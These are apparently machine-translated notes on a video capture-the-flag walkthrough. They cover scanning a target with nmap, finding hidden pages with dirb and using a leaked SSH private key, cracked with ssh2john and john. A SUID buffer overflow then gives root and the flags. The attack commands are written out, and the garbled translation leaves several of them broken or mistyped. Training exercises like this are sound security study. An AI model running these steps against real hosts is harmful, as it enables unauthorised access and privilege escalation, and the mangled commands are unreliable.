Station B video https://www.bilibili.com/video/BV1z4411K7Pt?p=3
1. Information detection
of ip address to scan, detect open service.
In fact loopholes for service penetration probe, then the corresponding data packet is sent to get the highest authority
- nmap -sV ip address mining Open Services Information
2. Analysis of detection results
for each service corresponds to a computer port, port scanning to find specific results
for special port probes, especially for the development of large ports http service for investigation
3. detect large port information
for large open http service port, you can take the http: // ip address: port-port / forms of access;
view the source code to obtain the corresponding information; If there is no flag information, the use of tools to detect hidden page
-dirb http: // ip address: port-port / service to detect the hidden files
4. analysis of the hidden page
accessed by a browser directly see the effect of
mining ssh information, continue to visit for more multi-leak ssh key (ssh role: to make the remote computer via ssh ssh client to log on to the service of the local server,
remote computer servers for remote operation
steps:
open the file .ssh,
download two private key file,
cd Desktop / switch to the desktop,
LS -alh view permissions,
chmod 600 id_isa, (given read and write permissions)
ssh -i id_rsa [email protected]
5. The ssh decryption key information
used to ssh2jhn john may identify as key information conversion information id_isa
the chmod 600 id_isa
ssh2john id_isa> isacrack
using decryption Dictionary isacrack information
zcat /usr/share/wordlists/rockyou.txt.gz | john the --pipe -
-rules isacrack
(| pipe symbol)
input to crack the code, Telnet host,
cd / root (in-depth root directory)
LS
CAT flag.txt (Tip enough authority, simon just an ordinary user)
to find files with root privileges
- the Find / -perm -4000 2> / dev / null
(-4000 represents a -perm execute permission
2> / dev / null to avoid the error output)
CAT read message.c, read FLAG2
read_message,
SimonAAAAAAAAAAAAAAAAAAAA / bin / SH mention the right
pwd,
the whoami,
result: the root
CAT flag.txt read flag3